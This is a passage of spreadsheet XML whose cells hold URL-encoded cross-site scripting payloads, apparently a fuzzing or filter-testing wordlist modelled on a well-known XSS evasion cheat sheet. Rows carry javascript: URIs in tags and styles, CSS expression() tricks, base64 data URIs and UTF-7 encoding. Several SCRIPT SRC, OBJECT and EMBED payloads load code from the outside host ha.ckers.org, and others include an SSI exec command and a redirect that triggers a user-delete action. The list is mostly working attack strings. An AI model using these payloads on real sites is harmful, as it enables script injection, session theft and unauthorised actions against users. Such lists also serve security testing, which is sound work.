      <c r="B836" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%5C%22livescript%26%23058%3B%26%2391%3Bcode%26%2393%3B%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="837">
      <c r="A837" s="3" t="s">
        <v>725</v>
      </c>
      <c r="B837" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%C5%BEscriptualert%28EXSSE%29%C5%BE%2Fscriptu</v>
      </c>
    </row>
    <row r="838">
      <c r="A838" s="3" t="s">
        <v>726</v>
      </c>
      <c r="B838" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BMETA%20HTTP-EQUIV%3D%5C%22refresh%5C%22%20CONTENT%3D%5C%220%3Burl%3Djavascript%26%23058%3Balert%28%27XSS%27%29%3B%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="839">
      <c r="A839" s="3" t="s">
        <v>727</v>
      </c>
      <c r="B839" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BMETA%20HTTP-EQUIV%3D%5C%22refresh%5C%22%20CONTENT%3D%5C%220%3Burl%3Ddata%26%2358%3Btext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="840">
      <c r="A840" s="3" t="s">
        <v>728</v>
      </c>
      <c r="B840" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BMETA%20HTTP-EQUIV%3D%5C%22refresh%5C%22%20CONTENT%3D%5C%220%3B%20URL%3Dhttp%26%2358%3B%2F%2F%3BURL%3Djavascript%26%23058%3Balert%28%27XSS%27%29%3B%5C%22</v>
      </c>
    </row>
    <row r="841">
      <c r="A841" s="3" t="s">
        <v>729</v>
      </c>
      <c r="B841" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIFRAME%20SRC%3D%5C%22javascript%26%23058%3Balert%28%27XSS%27%29%3B%5C%22%26gt%3B%26lt%3B%2FIFRAME%26gt%3B</v>
      </c>
    </row>
    <row r="842">
      <c r="A842" s="3" t="s">
        <v>730</v>
      </c>
      <c r="B842" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BFRAMESET%26gt%3B%26lt%3BFRAME%20SRC%3D%5C%22javascript%26%23058%3Balert%28%27XSS%27%29%3B%5C%22%26gt%3B%26lt%3B%2FFRAMESET%26gt%3B</v>
      </c>
    </row>
    <row r="843">
      <c r="A843" s="3" t="s">
        <v>731</v>
      </c>
      <c r="B843" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BTABLE%20BACKGROUND%3D%5C%22javascript%26%23058%3Balert%28%27XSS%27%29%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="844">
      <c r="A844" s="3" t="s">
        <v>732</v>
      </c>
      <c r="B844" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BTABLE%26gt%3B%26lt%3BTD%20BACKGROUND%3D%5C%22javascript%26%23058%3Balert%28%27XSS%27%29%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="845">
      <c r="A845" s="3" t="s">
        <v>733</v>
      </c>
      <c r="B845" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BDIV%20STYLE%3D%5C%22background-image%26%2358%3B%20url%28javascript%26%23058%3Balert%28%27XSS%27%29%29%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="846">
      <c r="A846" s="3" t="s">
        <v>734</v>
      </c>
      <c r="B846" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BDIV%20STYLE%3D%5C%22background-image%26%2358%3B%5C0075%5C0072%5C006C%5C0028%27%5C006a%5C0061%5C0076%5C0061%5C0073%5C0063%5C0072%5C0069%5C0070%5C0074%5C003a%5C0061%5C006c%5C0065%5C0072%5C0074%5C0028%26%2346%3B1027%5C0058%26%2346%3B1053%5C0053%5C0027%5C0029%27%5C0029%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="847">
      <c r="A847" s="3" t="s">
        <v>733</v>
      </c>
      <c r="B847" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BDIV%20STYLE%3D%5C%22background-image%26%2358%3B%20url%28javascript%26%23058%3Balert%28%27XSS%27%29%29%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="848">
      <c r="A848" s="3" t="s">
        <v>735</v>
      </c>
      <c r="B848" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BDIV%20STYLE%3D%5C%22width%26%2358%3B%20expression%28alert%28%27XSS%27%29%29%3B%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="849">
      <c r="A849" s="3" t="s">
        <v>736</v>
      </c>
      <c r="B849" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSTYLE%26gt%3B%40im%5Cport%27%5Cja%5Cvasc%5Cript%26%2358%3Balert%28%5C%22XSS%5C%22%29%27%3B%26lt%3B%2FSTYLE%26gt%3B</v>
      </c>
    </row>
    <row r="850">
      <c r="A850" s="3" t="s">
        <v>737</v>
      </c>
      <c r="B850" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20STYLE%3D%5C%22xss%26%2358%3Bexpr%2F%2AXSS%2A%2Fession%28alert%28%27XSS%27%29%29%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="851">
      <c r="A851" s="3" t="s">
        <v>738</v>
      </c>
      <c r="B851" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BXSS%20STYLE%3D%5C%22xss%26%2358%3Bexpression%28alert%28%27XSS%27%29%29%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="852">
      <c r="A852" s="3" t="s">
        <v>739</v>
      </c>
      <c r="B852" s="4" t="str">
        <f t="shared" si="1"/>
        <v>exp%2F%2A%26lt%3BA%20STYLE%3D%27no%5Cxss%26%2358%3Bnoxss%28%5C%22%2A%2F%2F%2A%5C%22%29%3B</v>
      </c>
    </row>
    <row r="853">
      <c r="A853" s="3" t="s">
        <v>740</v>
      </c>
      <c r="B853" s="4" t="str">
        <f t="shared" si="1"/>
        <v>xss%26%2358%3Bex%26%23x2F%3B%2AXSS%2A%2F%2F%2A%2F%2A%2Fpression%28alert%28%5C%22XSS%5C%22%29%29%27%26gt%3B</v>
      </c>
    </row>
    <row r="854">
      <c r="A854" s="3" t="s">
        <v>741</v>
      </c>
      <c r="B854" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSTYLE%20TYPE%3D%5C%22text%2Fjavascript%5C%22%26gt%3Balert%28%27XSS%27%29%3B%26lt%3B%2FSTYLE%26gt%3B</v>
      </c>
    </row>
    <row r="855">
      <c r="A855" s="3" t="s">
        <v>742</v>
      </c>
      <c r="B855" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSTYLE%26gt%3B%26%2346%3BXSS%7Bbackground-image%26%2358%3Burl%28%5C%22javascript%26%23058%3Balert%28%27XSS%27%29%5C%22%29%3B%7D%26lt%3B%2FSTYLE%26gt%3B%26lt%3BA%20CLASS%3DXSS%26gt%3B%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="856">
      <c r="A856" s="3" t="s">
        <v>743</v>
      </c>
      <c r="B856" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSTYLE%20type%3D%5C%22text%2Fcss%5C%22%26gt%3BBODY%7Bbackground%26%2358%3Burl%28%5C%22javascript%26%23058%3Balert%28%27XSS%27%29%5C%22%29%7D%26lt%3B%2FSTYLE%26gt%3B</v>
      </c>
    </row>
    <row r="857">
      <c r="A857" s="3" t="s">
        <v>744</v>
      </c>
      <c r="B857" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B%21--%26%2391%3Bif%20gte%20IE%204%26%2393%3B%26gt%3B</v>
      </c>
    </row>
    <row r="858">
      <c r="A858" s="3" t="s">
        <v>745</v>
      </c>
      <c r="B858" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%26gt%3Balert%28%27XSS%27%29%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="859">
      <c r="A859" s="3" t="s">
        <v>746</v>
      </c>
      <c r="B859" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B%21%26%2391%3Bendif%26%2393%3B--%26gt%3B</v>
      </c>
    </row>
    <row r="860">
      <c r="A860" s="3" t="s">
        <v>747</v>
      </c>
      <c r="B860" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BBASE%20HREF%3D%5C%22javascript%26%23058%3Balert%28%27XSS%27%29%3B%2F%2F%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="861">
      <c r="A861" s="3" t="s">
        <v>748</v>
      </c>
      <c r="B861" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BOBJECT%20TYPE%3D%5C%22text%2Fx-scriptlet%5C%22%20DATA%3D%5C%22http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fscriptlet%26%2346%3Bhtml%5C%22%26gt%3B%26lt%3B%2FOBJECT%26gt%3B</v>
      </c>
    </row>
    <row r="862">
      <c r="A862" s="3" t="s">
        <v>749</v>
      </c>
      <c r="B862" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BOBJECT%20classid%3Dclsid%26%2358%3Bae24fdae-03c6-11d1-8b76-0080c744f389%26gt%3B%26lt%3Bparam%20name%3Durl%20value%3Djavascript%26%23058%3Balert%28%27XSS%27%29%26gt%3B%26lt%3B%2FOBJECT%26gt%3B</v>
      </c>
    </row>
    <row r="863">
      <c r="A863" s="3" t="s">
        <v>750</v>
      </c>
      <c r="B863" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BEMBED%20SRC%3D%5C%22http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bswf%5C%22%20AllowScriptAccess%3D%5C%22always%5C%22%26gt%3B%26lt%3B%2FEMBED%26gt%3B</v>
      </c>
    </row>
    <row r="864">
      <c r="A864" s="3" t="s">
        <v>751</v>
      </c>
      <c r="B864" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BEMBED%20SRC%3D%5C%22data%26%2358%3Bimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH%20A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv%20MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs%20aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw%20IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh%20TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%5C%22%20type%3D%5C%22image%2Fsvg%2Bxml%5C%22%20AllowScriptAccess%3D%5C%22always%5C%22%26gt%3B%26lt%3B%2FEMBED%26gt%3B</v>
      </c>
    </row>
    <row r="865">
      <c r="A865" s="3" t="s">
        <v>752</v>
      </c>
      <c r="B865" s="4" t="str">
        <f t="shared" si="1"/>
        <v>a%3D%5C%22get%5C%22%3B</v>
      </c>
    </row>
    <row r="866">
      <c r="A866" s="3" t="s">
        <v>753</v>
      </c>
      <c r="B866" s="4" t="str">
        <f t="shared" si="1"/>
        <v>b%3D%5C%22URL%28%5C%5C%22%5C%22%3B</v>
      </c>
    </row>
    <row r="867">
      <c r="A867" s="3" t="s">
        <v>754</v>
      </c>
      <c r="B867" s="4" t="str">
        <f t="shared" si="1"/>
        <v>c%3D%5C%22javascript%26%23058%3B%5C%22%3B</v>
      </c>
    </row>
    <row r="868">
      <c r="A868" s="3" t="s">
        <v>755</v>
      </c>
      <c r="B868" s="4" t="str">
        <f t="shared" si="1"/>
        <v>d%3D%5C%22alert%28%27XSS%27%29%3B%5C%5C%22%29%5C%22%3B</v>
      </c>
    </row>
    <row r="869">
      <c r="A869" s="3" t="s">
        <v>756</v>
      </c>
      <c r="B869" s="4" t="str">
        <f t="shared" si="1"/>
        <v>eval%28a%2Bb%2Bc%2Bd%29%3B</v>
      </c>
    </row>
    <row r="870">
      <c r="A870" s="3" t="s">
        <v>757</v>
      </c>
      <c r="B870" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BHTML%20xmlns%26%2358%3Bxss%26gt%3B%26lt%3B%3Fimport%20namespace%3D%5C%22xss%5C%22%20implementation%3D%5C%22http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bhtc%5C%22%26gt%3B%26lt%3Bxss%26%2358%3Bxss%26gt%3BXSS%26lt%3B%2Fxss%26%2358%3Bxss%26gt%3B%26lt%3B%2FHTML%26gt%3B</v>
      </c>
    </row>
    <row r="871">
      <c r="A871" s="3" t="s">
        <v>758</v>
      </c>
      <c r="B871" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BXML%20ID%3DI%26gt%3B%26lt%3BX%26gt%3B%26lt%3BC%26gt%3B%26lt%3B%21%26%2391%3BCDATA%26%2391%3B%26lt%3BIMG%20SRC%3D%5C%22javas%26%2393%3B%26%2393%3B%26gt%3B%26lt%3B%21%26%2391%3BCDATA%26%2391%3Bcript%26%2358%3Balert%28%27XSS%27%29%3B%5C%22%26gt%3B%26%2393%3B%26%2393%3B%26gt%3B</v>
      </c>
    </row>
    <row r="872">
      <c r="A872" s="3" t="s">
        <v>759</v>
      </c>
      <c r="B872" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B%2FC%26gt%3B%26lt%3B%2FX%26gt%3B%26lt%3B%2Fxml%26gt%3B%26lt%3BSPAN%20DATASRC%3D%23I%20DATAFLD%3DC%20DATAFORMATAS%3DHTML%26gt%3B%26lt%3B%2FSPAN%26gt%3B</v>
      </c>
    </row>
    <row r="873">
      <c r="A873" s="3" t="s">
        <v>760</v>
      </c>
      <c r="B873" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BXML%20ID%3D%5C%22xss%5C%22%26gt%3B%26lt%3BI%26gt%3B%26lt%3BB%26gt%3B%26lt%3BIMG%20SRC%3D%5C%22javas%26lt%3B%21--%20--%26gt%3Bcript%26%2358%3Balert%28%27XSS%27%29%5C%22%26gt%3B%26lt%3B%2FB%26gt%3B%26lt%3B%2FI%26gt%3B%26lt%3B%2FXML%26gt%3B</v>
      </c>
    </row>
    <row r="874">
      <c r="A874" s="3" t="s">
        <v>761</v>
      </c>
      <c r="B874" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSPAN%20DATASRC%3D%5C%22%23xss%5C%22%20DATAFLD%3D%5C%22B%5C%22%20DATAFORMATAS%3D%5C%22HTML%5C%22%26gt%3B%26lt%3B%2FSPAN%26gt%3B</v>
      </c>
    </row>
    <row r="875">
      <c r="A875" s="3" t="s">
        <v>762</v>
      </c>
      <c r="B875" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BXML%20SRC%3D%5C%22xsstest%26%2346%3Bxml%5C%22%20ID%3DI%26gt%3B%26lt%3B%2FXML%26gt%3B</v>
      </c>
    </row>
    <row r="876">
      <c r="A876" s="3" t="s">
        <v>763</v>
      </c>
      <c r="B876" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSPAN%20DATASRC%3D%23I%20DATAFLD%3DC%20DATAFORMATAS%3DHTML%26gt%3B%26lt%3B%2FSPAN%26gt%3B</v>
      </c>
    </row>
    <row r="877">
      <c r="A877" s="3" t="s">
        <v>764</v>
      </c>
      <c r="B877" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BHTML%26gt%3B%26lt%3BBODY%26gt%3B</v>
      </c>
    </row>
    <row r="878">
      <c r="A878" s="3" t="s">
        <v>765</v>
      </c>
      <c r="B878" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B%3Fxml%26%2358%3Bnamespace%20prefix%3D%5C%22t%5C%22%20ns%3D%5C%22urn%26%2358%3Bschemas-microsoft-com%26%2358%3Btime%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="879">
      <c r="A879" s="3" t="s">
        <v>766</v>
      </c>
      <c r="B879" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B%3Fimport%20namespace%3D%5C%22t%5C%22%20implementation%3D%5C%22%23default%23time2%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="880">
      <c r="A880" s="3" t="s">
        <v>767</v>
      </c>
      <c r="B880" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3Bt%26%2358%3Bset%20attributeName%3D%5C%22innerHTML%5C%22%20to%3D%5C%22XSS%26lt%3BSCRIPT%20DEFER%26gt%3Balert%28%26quot%3BXSS%26quot%3B%29%26lt%3B%2FSCRIPT%26gt%3B%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="881">
      <c r="A881" s="3" t="s">
        <v>768</v>
      </c>
      <c r="B881" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B%2FBODY%26gt%3B%26lt%3B%2FHTML%26gt%3B</v>
      </c>
    </row>
    <row r="882">
      <c r="A882" s="3" t="s">
        <v>769</v>
      </c>
      <c r="B882" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20SRC%3D%5C%22http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bjpg%5C%22%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="883">
      <c r="A883" s="3" t="s">
        <v>770</v>
      </c>
      <c r="B883" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B%21--%23exec%20cmd%3D%5C%22%2Fbin%2Fecho%20%27%26lt%3BSCR%27%5C%22--%26gt%3B%26lt%3B%21--%23exec%20cmd%3D%5C%22%2Fbin%2Fecho%20%27IPT%20SRC%3Dhttp%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bjs%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B%27%5C%22--%26gt%3B</v>
      </c>
    </row>
    <row r="884">
      <c r="A884" s="3" t="s">
        <v>771</v>
      </c>
      <c r="B884" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B%3F%20echo%28%27%26lt%3BSCR%29%27%3B</v>
      </c>
    </row>
    <row r="885">
      <c r="A885" s="3" t="s">
        <v>772</v>
      </c>
      <c r="B885" s="4" t="str">
        <f t="shared" si="1"/>
        <v>echo%28%27IPT%26gt%3Balert%28%5C%22XSS%5C%22%29%26lt%3B%2FSCRIPT%26gt%3B%27%29%3B%20%3F%26gt%3B</v>
      </c>
    </row>
    <row r="886">
      <c r="A886" s="3" t="s">
        <v>773</v>
      </c>
      <c r="B886" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%5C%22http%26%2358%3B%2F%2Fwww%26%2346%3Bthesiteyouareon%26%2346%3Bcom%2Fsomecommand%26%2346%3Bphp%3Fsomevariables%3Dmaliciouscode%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="887">
      <c r="A887" s="3" t="s">
        <v>774</v>
      </c>
      <c r="B887" s="4" t="str">
        <f t="shared" si="1"/>
        <v>Redirect%20302%20%2Fa%26%2346%3Bjpg%20http%26%2358%3B%2F%2Fvictimsite%26%2346%3Bcom%2Fadmin%26%2346%3Basp%26deleteuser</v>
      </c>
    </row>
    <row r="888">
      <c r="A888" s="3" t="s">
        <v>775</v>
      </c>
      <c r="B888" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BMETA%20HTTP-EQUIV%3D%5C%22Set-Cookie%5C%22%20Content%3D%5C%22USERID%3D%26lt%3BSCRIPT%26gt%3Balert%28%27XSS%27%29%26lt%3B%2FSCRIPT%26gt%3B%5C%22%26gt%3B</v>
      </c>
    </row>
    <row r="889">
      <c r="A889" s="3" t="s">
        <v>776</v>
      </c>
      <c r="B889" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BHEAD%26gt%3B%26lt%3BMETA%20HTTP-EQUIV%3D%5C%22CONTENT-TYPE%5C%22%20CONTENT%3D%5C%22text%2Fhtml%3B%20charset%3DUTF-7%5C%22%26gt%3B%20%26lt%3B%2FHEAD%26gt%3B%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-</v>
      </c>
    </row>
    <row r="890">
      <c r="A890" s="3" t="s">
        <v>777</v>
      </c>
      <c r="B890" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20a%3D%5C%22%26gt%3B%5C%22%20SRC%3D%5C%22http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bjs%5C%22%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="891">
      <c r="A891" s="3" t="s">
        <v>778</v>
      </c>
      <c r="B891" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20%3D%5C%22%26gt%3B%5C%22%20SRC%3D%5C%22http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bjs%5C%22%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="892">
      <c r="A892" s="3" t="s">
        <v>779</v>
      </c>
      <c r="B892" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20a%3D%5C%22%26gt%3B%5C%22%20%27%27%20SRC%3D%5C%22http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bjs%5C%22%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="893">
      <c r="A893" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B893" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20%5C%22a%3D%27%26gt%3B%27%5C%22%20SRC%3D%5C%22http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bjs%5C%22%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="894">
      <c r="A894" s="3" t="s">
        <v>781</v>
      </c>
      <c r="B894" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20a%3D%60%26gt%3B%60%20SRC%3D%5C%22http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bjs%5C%22%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="895">
      <c r="A895" s="3" t="s">
        <v>782</v>
      </c>
      <c r="B895" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20a%3D%5C%22%26gt%3B%27%26gt%3B%5C%22%20SRC%3D%5C%22http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bjs%5C%22%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="896">
      <c r="A896" s="3" t="s">
        <v>783</v>
      </c>
      <c r="B896" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%26gt%3Bdocument%26%2346%3Bwrite%28%5C%22%26lt%3BSCRI%5C%22%29%3B%26lt%3B%2FSCRIPT%26gt%3BPT%20SRC%3D%5C%22http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%2Fxss%26%2346%3Bjs%5C%22%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="897">
      <c r="A897" s="3" t="s">
        <v>784</v>
      </c>
      <c r="B897" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%5C%22http%26%2358%3B%2F%2F66%26%2346%3B102%26%2346%3B7%26%2346%3B147%2F%5C%22%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="898">
      <c r="A898" s="3" t="s">
        <v>785</v>
      </c>
      <c r="B898" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%5C%22http%26%2358%3B%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%5C%22%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="899">
      <c r="A899" s="3" t="s">
        <v>786</v>
      </c>
      <c r="B899" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%5C%22http%26%2358%3B%2F%2F1113982867%2F%5C%22%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="900">
      <c r="A900" s="3" t="s">
        <v>787</v>
      </c>
      <c r="B900" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%5C%22http%26%2358%3B%2F%2F0x42%26%2346%3B0x0000066%26%2346%3B0x7%26%2346%3B0x93%2F%5C%22%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="901">
      <c r="A901" s="3" t="s">
        <v>788</v>
      </c>
      <c r="B901" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%5C%22http%26%2358%3B%2F%2F0102%26%2346%3B0146%26%2346%3B0007%26%2346%3B00000223%2F%5C%22%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="902">
      <c r="A902" s="3" t="s">
        <v>789</v>
      </c>
      <c r="B902" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%5C%22htt%20p%26%2358%3B%2F%2F6%206%26%2346%3B000146%26%2346%3B0x7%26%2346%3B147%2F%5C%22%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="903">
      <c r="A903" s="3" t="s">
        <v>790</v>
      </c>
      <c r="B903" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%5C%22%2F%2Fwww%26%2346%3Bgoogle%26%2346%3Bcom%2F%5C%22%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="904">
      <c r="A904" s="3" t="s">
        <v>791</v>
      </c>
      <c r="B904" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%5C%22%2F%2Fgoogle%5C%22%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="905">
      <c r="A905" s="3" t="s">
        <v>792</v>
      </c>
      <c r="B905" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%5C%22http%26%2358%3B%2F%2Fha%26%2346%3Bckers%26%2346%3Borg%40google%5C%22%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="906">
      <c r="A906" s="3" t="s">
        <v>793</v>
      </c>
      <c r="B906" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%5C%22http%26%2358%3B%2F%2Fgoogle%26%2358%3Bha%26%2346%3Bckers%26%2346%3Borg%5C%22%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="907">
      <c r="A907" s="3" t="s">
        <v>794</v>
      </c>
      <c r="B907" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%5C%22http%26%2358%3B%2F%2Fgoogle%26%2346%3Bcom%2F%5C%22%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="908">
      <c r="A908" s="3" t="s">
        <v>795</v>
      </c>
      <c r="B908" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%5C%22http%26%2358%3B%2F%2Fwww%26%2346%3Bgoogle%26%2346%3Bcom%26%2346%3B%2F%5C%22%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="909">
      <c r="A909" s="3" t="s">
        <v>796</v>
      </c>
      <c r="B909" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%5C%22javascript%26%23058%3Bdocument%26%2346%3Blocation%3D%27http%26%2358%3B%2F%2Fwww%26%2346%3Bgoogle%26%2346%3Bcom%2F%27%5C%22%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="910">
      <c r="A910" s="3" t="s">
        <v>797</v>
      </c>
      <c r="B910" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%5C%22http%26%2358%3B%2F%2Fwww%26%2346%3Bgohttp%26%2358%3B%2F%2Fwww%26%2346%3Bgoogle%26%2346%3Bcom%2Fogle%26%2346%3Bcom%2F%5C%22%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="911">
      <c r="A911" s="3" t="s">
        <v>798</v>
      </c>
      <c r="B911" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B</v>
      </c>
    </row>
    <row r="912">
      <c r="A912" s="3" t="s">
        <v>799</v>
      </c>
      <c r="B912" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%253C</v>
      </c>
    </row>
    <row r="913">
